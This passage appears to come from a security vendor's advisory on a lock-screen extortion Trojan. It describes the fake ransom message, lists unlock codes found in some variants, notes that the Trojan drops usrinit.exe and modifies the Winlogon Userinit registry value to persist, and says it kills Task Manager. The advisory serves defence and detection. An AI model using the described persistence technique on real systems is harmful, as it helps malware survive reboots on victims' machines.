    When your system is unblocked you must remove all the illegal materials from your device.

    ENTER THE CODE:

The Trojan alleged that the user engages in illegal activities and have in possession materials in violation of Internet usage causing the system lock down. The message of course is a scam and just the Trojan’s way to extort money from the user.

Interestingly, the unlock code is embedded in the malware and can be used to regain control of the system. Some of the unlock codes seen on different variants of this malware are the following:

  • 8875510
  • 8095147
  • 3796054

After unlocking the system, the malware will delete itself.

Installation:

Drops a copy of itself:

  • %Windows% usrinit.exe – [ detected as GAV: PornoBlocker.DMQ (Trojan) ]

Registry Changes:

Modifies the registry entry below to ensure that the dropped copy of the malware starts on every system reboot:

  • Key: [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon]
    Value: Userinit
    Old Data: “C:WINDOWSsystem32userinit.exe,”
    New Data: “C:WINDOWSsystem32userinit.exe,” “C:WINDOWSsystem32userinit.exe,C:WINDOWSsystem32usrinit.exe”

Other System Modification:

Terminates the following process:

  • Task Manager

SonicWALL Gateway AntiVirus provides protection against this worm via the following signatures:

GAV: PornoBlocker.DMQ (Trojan)
GAV: PornoBlocker.DMS (Trojan)
GAV: LockScreen.P (Trojan)